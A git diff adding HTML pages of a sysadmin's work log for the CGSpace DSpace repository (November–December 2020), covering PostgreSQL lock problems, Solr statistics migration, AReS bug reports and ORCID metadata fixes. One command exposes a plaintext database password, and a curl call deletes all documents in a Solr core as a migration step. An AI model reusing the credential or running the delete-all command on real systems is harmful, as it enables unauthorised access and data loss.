+<li>Chat with Peter about using some remaining CRP Livestock open access money to fund more work on OpenRXV / AReS
+<ul>
+<li>I will create GitHub issues for each of the things we talked about and then create ToRs to send to CodeObia for a quote</li>
+</ul>
+</li>
+<li>Continue migrating Solr statistics to DSpace 6 UUID format after the upgrade on Sunday</li>
+<li>Regarding the IWMI issue about flagships and strategic priorities we can use CRP Livestock as an example because all their <a href="https://cgspace.cgiar.org/handle/10568/80102">flagships are mapped to collections</a></li>
+<li>Database issues are worse today&hellip;</li>
+</ul>
+<p><img src="/cgspace-notes/2020/11/postgres_connections_ALL-week2.png" alt="PostgreSQL connections week"></p>
+<ul>
+<li>There are over 2,000 locks:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
+2071
+</code></pre><h2 id="2020-11-18">2020-11-18</h2>
+<ul>
+<li>I decided to enable the <code>rollbackOnReturn=true</code> option in <a href="https://tomcat.apache.org/tomcat-7.0-doc/jdbc-pool.html">Tomcat&rsquo;s JDBC connection pool parameters</a> because I noticed that all of the &ldquo;idle in transaction&rdquo; connections waiting for locks were SELECT queries
+<ul>
+<li>There are many posts on the Internet about people having this issue with Hibernate</li>
+<li>The locks are lower now, but Peter and Abenet are still having issues approving items and Tezira forwarded one strange case where an item was &ldquo;approved&rdquo; and was assigned a handle, but it doesn&rsquo;t exist&hellip;</li>
+<li>I sent another mail to the dspace-tech mailing list to ask for help</li>
+<li>I reverted the <code>rollbackOnReturn</code> change in Tomcat&hellip;</li>
+<li>I sent a message to Atmire to ask for urgent help</li>
+</ul>
+</li>
+<li>Call with IWMI and Abenet about them potentially moving from InMagic to CGSpace
+<ul>
+<li>They have questions about the reporting on AReS</li>
+<li>We told them that we can use collections to infer Strategic Priorities and Research Groups and WLE Flagships</li>
+<li>It sounds like we will create this structure under the top-level IWMI community:
+<ul>
+<li>IWMI Strategic Priorities (sub-community)
+<ul>
+<li>Water, Food and Ecosystems (sub-community)
+<ul>
+<li>Sustainable and Resilient Food Production Systems (collection)</li>
+<li>Sustainable Water infrastructure and Ecosystems (collection)</li>
+<li>Integrated Basin and Aquifer Management</li>
+</ul>
+</li>
+<li>Water, Climate Change and Resilience (sub-community)
+<ul>
+<li>Climate Change Adaptation and Resilience (collection)</li>
+</ul>
+</li>
+<li>etc&hellip;</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>They will submit items to their normal output type collections and map to these</li>
+</ul>
+</li>
+<li>In other news I finally finished processing the Solr statistics for UUIDs and re-indexed the stats with the dspace-statistics-api
+<ul>
+<li>I started the Atmire stats processing, notes in the dedicated <a href="/cgspace-notes/cgspace-dspace6-upgrade/">CGSpace DSpace 6 Upgrade section</a></li>
+</ul>
+</li>
+<li>Peter got a strange message this evening when trying to update metadata:</li>
+</ul>
+<pre tabindex="0"><code>2020-11-18 16:57:33,309 ERROR org.hibernate.engine.jdbc.batch.internal.BatchingBatch @ HHH000315: Exception executing batch [Batch update returned unexpected row count from update [0]; actual row count: 0; expected: 1]
+2020-11-18 16:57:33,316 ERROR org.hibernate.engine.jdbc.batch.internal.BatchingBatch @ HHH000315: Exception executing batch [Batch update returned unexpected row count from update [13]; actual row count: 0; expected: 1]
+2020-11-18 16:57:33,385 INFO  org.hibernate.engine.jdbc.batch.internal.AbstractBatchImpl @ HHH000010: On release of batch it still contained JDBC statements
+</code></pre><ul>
+<li>Minor bug fixes to limit parameter in DSpace Statistics API
+<ul>
+<li>Release <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.2">version 1.3.2</a></li>
+</ul>
+</li>
+<li>Send a list of potential ToRs for a next phase of OpenRXV development to Michael Victor for feedback:
+<ul>
+<li>Enable advanced reporting templates using &ldquo;Angular expressions&rdquo; in Docxtemplater (would be used immediately for IWMI and Bioversity–CIAT)</li>
+<li>Enable embedding of charts like world map and word cloud in reports</li>
+<li>Enable embedding of item thumbnails in reports, similar to the &ldquo;list of information products&rdquo;</li>
+<li>Enable something like the &ldquo;Statistics&rdquo; Excel report Peter wanted in 2019 so we can get community and collection statistics reports</li>
+<li>Add a new &ldquo;metrics&rdquo; block with statistics about top authors and items by number of views and downloads for the current search terms</li>
+<li>Add ability to change the explorer UI to &ldquo;Usage Statistics&rdquo; mode where lists of authors, affiliations, sponsors, CRPs, communities, collections, etc are sorted according to the number of views or downloads for the current search results, rather than by number of occurrences of metadata values</li>
+<li>Add ability to &ldquo;drill down&rdquo; or modify search filter terms by clicking on countries in the map</li>
+<li>Enable date-based usage statistics (currently only &ldquo;all time&rdquo; statistics are available)</li>
+<li>Fixing minor bugs for all issues filed on GitHub</li>
+</ul>
+</li>
+<li>I also added GitHub issues for each of them</li>
+</ul>
+<h2 id="2020-11-19">2020-11-19</h2>
+<ul>
+<li>I started a fresh reharvest on AReS and when it was done I noticed that the metadata from CGSpace is fine, but the views and downloads don&rsquo;t seem to be working</li>
+<li>Peter said he was able to approve a few items on CGSpace immediately &ldquo;like old times&rdquo; this morning</li>
+<li>The PostgreSQL status looks much better now, though I haven&rsquo;t changed anything</li>
+</ul>
+<p><img src="/cgspace-notes/2020/11/postgres_connections_ALL-week3.png" alt="PostgreSQL connections week">
+<img src="/cgspace-notes/2020/11/postgres_locks_ALL-week2.png" alt="PostgreSQL locks week">
+<img src="/cgspace-notes/2020/11/postgres_xlog-week.png" alt="PostgreSQL transaction log week">
+<img src="/cgspace-notes/2020/11/postgres_transactions_ALL-week.png" alt="PostgreSQL transactions week"></p>
+<ul>
+<li>Very curious that there was such a high number of rolled back transactions after the update</li>
+</ul>
+<h2 id="2020-11-22">2020-11-22</h2>
+<ul>
+<li>PostgreSQL situation on CGSpace (linode18) looks much better now:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/11/postgres_locks_ALL-week3.png" alt="PostgreSQL locks week">
+<img src="/cgspace-notes/2020/11/postgres_xlog-week2.png" alt="PostgreSQL transaction log week"></p>
+<ul>
+<li>In other news, I noticed that harvesting DSpace 6 works fine in OpenRXV, but the statistics fail on page 1
+<ul>
+<li>I filed an issue: <a href="https://github.com/ilri/OpenRXV/issues/59">https://github.com/ilri/OpenRXV/issues/59</a></li>
+</ul>
+</li>
+<li>Abenet asked for help trying to add a new user to the Bioversity and CIAT groups on CGSpace
+<ul>
+<li>I see that the user search is split on five results, so the user in question appears on page 2</li>
+<li>I asked Abenet if she was getting an error or it was simply this&hellip;</li>
+</ul>
+</li>
+<li>Maria Garuccio sent me an example report that she wants to be able to generate from AReS
+<ul>
+<li>First, she would like to have the option to group by output type</li>
+<li>Second, she would like to be able to control the sorting in the template, like sorting the citation alphabetically</li>
+<li>I filed an issue: <a href="https://github.com/ilri/OpenRXV/issues/60">https://github.com/ilri/OpenRXV/issues/60</a></li>
+</ul>
+</li>
+<li>Mohammad Salem had asked if there was an item ID to UUID mapping for CGSpace
+<ul>
+<li>I found a thread on the dspace-tech mailing list that pointed out that there is a new <code>uuid</code> column in the item table</li>
+<li>Only old items have an <code>item_id</code> so we can get a mapping easily:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT item_id,uuid FROM item WHERE in_archive=&#39;t&#39; AND withdrawn=&#39;f&#39; AND item_id IS NOT NULL) TO /tmp/2020-11-22-item-id2uuid.csv WITH CSV HEADER;
+COPY 87411
+</code></pre><ul>
+<li>Saving some notes I wrote down about faceting by community and collection in Solr, for potential use in the future in the DSpace Statistics API</li>
+<li>Facet by owningComm to see total number of distinct communities (136):</li>
+</ul>
+<pre tabindex="0"><code>  facet=true&amp;facet.mincount=1&amp;facet.field=owningComm&amp;facet.limit=1&amp;facet.offset=0&amp;stats=true&amp;stats.field=id&amp;stats.calcdistinct=true
+</code></pre><ul>
+<li>Facet by owningComm and get the first 5 distinct:</li>
+</ul>
+<pre tabindex="0"><code>  facet=true&amp;facet.mincount=1&amp;facet.field=owningComm&amp;facet.limit=5&amp;facet.offset=0&amp;facet.pivot=id,countryCode
+</code></pre><ul>
+<li>Facet by owningComm and countryCode using facet.pivot and maybe I can just skip the normal facet params?</li>
+</ul>
+<pre tabindex="0"><code>facet=true&amp;f.owningComm.facet.limit=5&amp;f.owningComm.facet.offset=5&amp;facet.pivot=owningComm,countryCode
+</code></pre><ul>
+<li>Facet by owningComm and countryCode using facet.pivot and limiting to top five countries&hellip; fuck it&rsquo;s possible!</li>
+</ul>
+<pre tabindex="0"><code>facet=true&amp;f.owningComm.facet.limit=5&amp;f.owningComm.facet.offset=5&amp;f.countryCode.facet.limit=5&amp;facet.pivot=owningComm,countryCode
+</code></pre><h2 id="2020-11-23">2020-11-23</h2>
+<ul>
+<li>I created the sub-communities and collections for IWMI&rsquo;s Strategic Priorities and Research Groups on CGSpace: <a href="https://cgspace.cgiar.org/handle/10568/110259">https://cgspace.cgiar.org/handle/10568/110259</a></li>
+</ul>
+<h2 id="2020-11-24">2020-11-24</h2>
+<ul>
+<li>Yesterday Abenet asked me to investigate why AReS only shows 9,000 &ldquo;livestock&rdquo; terms in the ILRI community on AReS, but on CGSpace we have over 10,000
+<ul>
+<li>I added the lowercase formatter to all center and CRP subjects fields and re-harvested</li>
+<li>Now I see there are 9,999, which seems suspicious</li>
+<li>I filed a bug on GitHub: <a href="https://github.com/ilri/OpenRXV/issues/61">https://github.com/ilri/OpenRXV/issues/61</a></li>
+</ul>
+</li>
+<li>Help Abenet map an item on CGSpace for CIAT
+<ul>
+<li>If I search for the entire item title I don&rsquo;t get any results, but I notice this item had a &ldquo;:&rdquo; in the title, so I tried searching for part of the title without the colon and it worked</li>
+<li>It is a mystery to me that you can&rsquo;t map an item using its Handle&hellip;</li>
+</ul>
+</li>
+<li>I started processing the statistics-2011 core with Atmire&rsquo;s AtomicStatisticsUpdateCLI tool</li>
+<li>I called Moayad and we worked on the views/downloads issue on OpenRXV
+<ul>
+<li>It turns out to be a mapping (schema) issue in Elasticsearch due to DSpace 6 UUIDs (LOL!!)</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-11-25">2020-11-25</h2>
+<ul>
+<li>Zoom meeting with ILRI communicators about CGSpace, Altmetric, and AReS</li>
+<li>Send an email to Richard Fulss and Paola Camargo Paz at CIMMYT about having them work closer with us on AReS</li>
+<li>Send an email to Usman at CIFOR to ask how his DSpace stuff is going</li>
+<li>The Atmire AtomicStatisticsUpdateCLI tool finished processing the statistics-2017 core</li>
+<li>Atmire responded about the duplicate fields in Solr and said they don&rsquo;t see them
+<ul>
+<li>I sent a few examples that I found after thirty seconds of randomly looking in several Solr cores</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-11-27">2020-11-27</h2>
+<ul>
+<li>I finished processing the statistics-2016 core with the AtomicStatisticsUpdateCLI tool so I started the statistics-2015 core</li>
+</ul>
+<h2 id="2020-11-28">2020-11-28</h2>
+<ul>
+<li>I finished processing the statistics-2015 core with the AtomicStatisticsUpdateCLI tool so I started the statistics-2014 core</li>
+<li>I finished processing the statistics-2014 core with the AtomicStatisticsUpdateCLI tool so I started the statistics-2013 core</li>
+<li>I finished processing the statistics-2014 core with the AtomicStatisticsUpdateCLI tool so I started the statistics-2012 core</li>
+<li>I finished processing the statistics-2014 core with the AtomicStatisticsUpdateCLI tool so I started the statistics-2012 core</li>
+<li>I finished processing the statistics-2014 core with the AtomicStatisticsUpdateCLI tool so I started the statistics-2010 core</li>
+</ul>
+<h2 id="2020-11-29">2020-11-29</h2>
+<ul>
+<li>Peter told me that he can&rsquo;t find the <a href="https://cgspace.cgiar.org/handle/10568/80099">CGIAR Research Program on Livestock</a> community in the community filters on AReS
+<ul>
+<li>I looked briefly and couldn&rsquo;t find it either so I filed an issue on OpenRXV: <a href="https://github.com/ilri/OpenRXV/issues/62">https://github.com/ilri/OpenRXV/issues/62</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-11-30">2020-11-30</h2>
+<ul>
+<li>Ben Hack asked for the ILRI subject we are using on CGSpace
+<ul>
+<li>I linked him the input-forms.xml file and also sent him a list of 112 terms extracted with <code>xml</code> from the xmlstarlet package:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ xml sel -t -m &#39;//value-pairs[@value-pairs-name=&#34;ilrisubject&#34;]/pair/displayed-value/text()&#39; -c &#39;.&#39; -n dspace/config/input-forms.xml
+</code></pre><ul>
+<li>IWMI sent me a few new ORCID identifiers so I combined them with our existing ones as well as another ILRI one that Tezira asked me to update, filtered the unique ones, and then resolved their names using my <code>resolve-orcids.py</code> script:</li>
+</ul>
+<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt /tmp/hung.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2020-11-30-combined-orcids.txt
+$ ./resolve-orcids.py -i /tmp/2020-11-30-combined-orcids.txt -o /tmp/2020-11-30-combined-orcids-names.txt -d
+# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+</code></pre><ul>
+<li>I used my <code>fix-metadata-values.py</code> script to update the old occurences of Hung&rsquo;s ORCID and some others that I see have changed:</li>
+</ul>
+<pre tabindex="0"><code>$ cat 2020-11-30-fix-hung-orcid.csv
+cg.creator.id,correct
+&#34;Hung Nguyen-Viet: 0000-0001-9877-0596&#34;,&#34;Hung Nguyen-Viet: 0000-0003-1549-2733&#34;
+&#34;Adriana Tofiño: 0000-0001-7115-7169&#34;,&#34;Adriana Tofiño Rivera: 0000-0001-7115-7169&#34;
+&#34;Cristhian Puerta Rodriguez: 0000-0001-5992-1697&#34;,&#34;David Puerta: 0000-0001-5992-1697&#34;
+&#34;Ermias Betemariam: 0000-0002-1955-6995&#34;,&#34;Ermias Aynekulu: 0000-0002-1955-6995&#34;
+&#34;Hirut Betaw: 0000-0002-1205-3711&#34;,&#34;Betaw Hirut: 0000-0002-1205-3711&#34;
+&#34;Megan Zandstra: 0000-0002-3326-6492&#34;,&#34;Megan McNeil Zandstra: 0000-0002-3326-6492&#34;
+&#34;Tolu Eyinla: 0000-0003-1442-4392&#34;,&#34;Toluwalope Emmanuel: 0000-0003-1442-4392&#34;
+&#34;VInay Nangia: 0000-0001-5148-8614&#34;,&#34;Vinay Nangia: 0000-0001-5148-8614&#34;
+$ ./fix-metadata-values.py -i 2020-11-30-fix-hung-orcid.csv -db dspace63 -u dspacetest -p &#39;dom@in34sniper&#39; -f cg.creator.id -t &#39;correct&#39; -m 240
+</code></pre><!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2020-12/index.html b/docs/2020-12/index.html
new file mode 100644
index 000000000..1b050b4b3
--- /dev/null
+++ b/docs/2020-12/index.html
@@ -0,0 +1,923 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="December, 2020" />
+<meta property="og:description" content="2020-12-01
+
+Atmire responded about the issue with duplicate data in our Solr statistics
+
+They noticed that some records in the statistics-2015 core haven&rsquo;t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven&rsquo;t migrated any of the records yet
+That&rsquo;s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, as according to the cua_version field
+I started processing those (about 411,000 records):
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-12/" />
+<meta property="article:published_time" content="2020-12-01T11:32:54+02:00" />
+<meta property="article:modified_time" content="2021-01-04T20:09:02+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="December, 2020"/>
+<meta name="twitter:description" content="2020-12-01
+
+Atmire responded about the issue with duplicate data in our Solr statistics
+
+They noticed that some records in the statistics-2015 core haven&rsquo;t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven&rsquo;t migrated any of the records yet
+That&rsquo;s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, as according to the cua_version field
+I started processing those (about 411,000 records):
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "December, 2020",
+  "url": "https://alanorth.github.io/cgspace-notes/2020-12/",
+  "wordCount": "3772",
+  "datePublished": "2020-12-01T11:32:54+02:00",
+  "dateModified": "2021-01-04T20:09:02+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2020-12/">
+
+    <title>December, 2020 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-12/">December, 2020</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2020-12-01T11:32:54+02:00">Tue Dec 01, 2020</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-12-01">2020-12-01</h2>
+<ul>
+<li>Atmire responded about the issue with duplicate data in our Solr statistics
+<ul>
+<li>They noticed that some records in the statistics-2015 core haven&rsquo;t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven&rsquo;t migrated any of the records yet</li>
+<li>That&rsquo;s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, as according to the <code>cua_version</code> field</li>
+<li>I started processing those (about 411,000 records):</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t <span style="color:#ae81ff">12</span> -c statistics-2015
+</span></span></code></pre></div><ul>
+<li>AReS went down when the <code>renew-letsencrypt</code> service stopped the <code>angular_nginx</code> container in the pre-update hook and failed to bring it back up
+<ul>
+<li>I ran all system updates on the host and rebooted it and AReS came back up OK</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-12-02">2020-12-02</h2>
+<ul>
+<li>Udana emailed me yesterday to ask why the CGSpace usage statistics were showing &ldquo;No Data&rdquo;
+<ul>
+<li>I noticed a message in the Solr Admin UI that one of the statistics cores failed to load, but it is up and I can query it&hellip;</li>
+<li>Nevertheless, I restarted Tomcat a few times to see if all cores would come up without an error message, but had no success (despite that all cores ARE up and I can query them, <em>sigh</em>)</li>
+<li>I think I will move all the Solr yearly statistics back into the main statistics core</li>
+</ul>
+</li>
+<li>Start testing export/import of yearly Solr statistics data into the main statistics core on DSpace Test, for example:</li>
+</ul>
+<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
+$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
+$ curl -s &#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#34;
+</code></pre><ul>
+<li>I deployed Tomcat 7.0.107 on DSpace Test (CGSpace is still Tomcat 7.0.104)</li>
+<li>I finished migrating all the statistics from the yearly shards back to the main core</li>
+</ul>
+<h2 id="2020-12-05">2020-12-05</h2>
+<ul>
+<li>I deleted all the yearly statistics shards and restarted Tomcat on DSpace Test (linode26)</li>
+</ul>
+<h2 id="2020-12-06">2020-12-06</h2>
+<ul>
+<li>Looking into the statistics on DSpace Test after I migrated them back to the main core
+<ul>
+<li>All stats are working as expected&hellip; indexing time for the DSpace Statistics API is the same&hellip; and I don&rsquo;t even see a difference in the JVM or memory stats in Munin other than a minor jump last week when I was processing them</li>
+</ul>
+</li>
+<li>I will migrate them on CGSpace too I think
+<ul>
+<li>First I will start with the statistics-2010 and statistics-2015 cores because they were the ones that were failing to load recently (despite actually being available in Solr WTF)</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/12/solr-statistics-2010-failed.png" alt="Error message in Solr admin UI about the statistics-2010 core failing to load"></p>
+<ul>
+<li>First the 2010 core:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
+</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
+</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><ul>
+<li>Judging by the DSpace logs all these cores had a problem starting up in the last month:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -rsI <span style="color:#e6db74">&#34;Unable to create core&#34;</span> <span style="color:#f92672">[</span>dspace<span style="color:#f92672">]</span>/log/dspace.log.2020-* | grep -o -E <span style="color:#e6db74">&#34;statistics-[0-9]+&#34;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>     24 statistics-2010
+</span></span><span style="display:flex;"><span>     24 statistics-2015
+</span></span><span style="display:flex;"><span>     18 statistics-2016
+</span></span><span style="display:flex;"><span>      6 statistics-2018
+</span></span></code></pre></div><ul>
+<li>The message is always this:</li>
+</ul>
+<pre tabindex="0"><code>org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error CREATEing SolrCore &#39;statistics-2016&#39;: Unable to create core [statistics-2016] Caused by: Lock obtain timed out: NativeFSLock@/[dspace]/solr/statistics-2016/data/index/write.lock
+</code></pre><ul>
+<li>I will migrate all these cores and see if it makes a difference, then probably end up migrating all of them
+<ul>
+<li>I removed the statistics-2010, statistics-2015, statistics-2016, and statistics-2018 cores and restarted Tomcat and <em>all the statistics cores came up OK and the CUA statistics are OK</em>!</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-12-07">2020-12-07</h2>
+<ul>
+<li>Run <code>dspace cleanup -v</code> on CGSpace to clean up deleted bitstreams</li>
+<li>Atmire sent a <a href="https://github.com/ilri/DSpace/pull/457">pull request</a> to address the duplicate owningComm and owningColl
+<ul>
+<li>Built and deployed it on DSpace Test but I am not sure how to run it yet</li>
+<li>I sent feedback to Atmire on their tracker: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839</a></li>
+</ul>
+</li>
+<li>Abenet and Tezira are having issues with committing to the archive in their workflow
+<ul>
+<li>I looked at the server and indeed the locks and transactions are back up:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/12/postgres_transactions_ALL-day.png" alt="PostgreSQL Transactions day">
+<img src="/cgspace-notes/2020/12/postgres_locks_ALL-day.png" alt="PostgreSQL Locks day">
+<img src="/cgspace-notes/2020/12/postgres_querylength_ALL-day.png" alt="PostgreSQL Locks day">
+<img src="/cgspace-notes/2020/12/postgres_connections_ALL-day.png" alt="PostgreSQL Connections day"></p>
+<ul>
+<li>There are apparently 1,700 locks right now:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>1739
+</span></span></code></pre></div><h2 id="2020-12-08">2020-12-08</h2>
+<ul>
+<li>Atmire sent some instructions for using the DeduplicateValuesProcessor
+<ul>
+<li>I modified <code>atmire-cua-update.xml</code> as they instructed, but I get a million errors like this when I run AtomicStatisticsUpdateCLI with that configuration:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0 couldn&#39;t be processed
+com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0, an error occured in the com.atmire.statistics.util.update.atomic.processor.DeduplicateValuesProcessor
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:161)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: java.lang.UnsupportedOperationException
+        at org.apache.solr.common.SolrDocument$1.entrySet(SolrDocument.java:256)
+        at java.util.HashMap.putMapEntries(HashMap.java:512)
+        at java.util.HashMap.&lt;init&gt;(HashMap.java:490)
+        at com.atmire.statistics.util.update.atomic.record.Record.getFieldValuesMap(SourceFile:86)
+        at com.atmire.statistics.util.update.atomic.processor.DeduplicateValuesProcessor.process(SourceFile:38)
+        at com.atmire.statistics.util.update.atomic.processor.DeduplicateValuesProcessor.visit(SourceFile:34)
+        at com.atmire.statistics.util.update.atomic.record.UsageRecord.accept(SourceFile:23)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:301)
+        ... 10 more
+</code></pre><ul>
+<li>I sent some feedback to Atmire
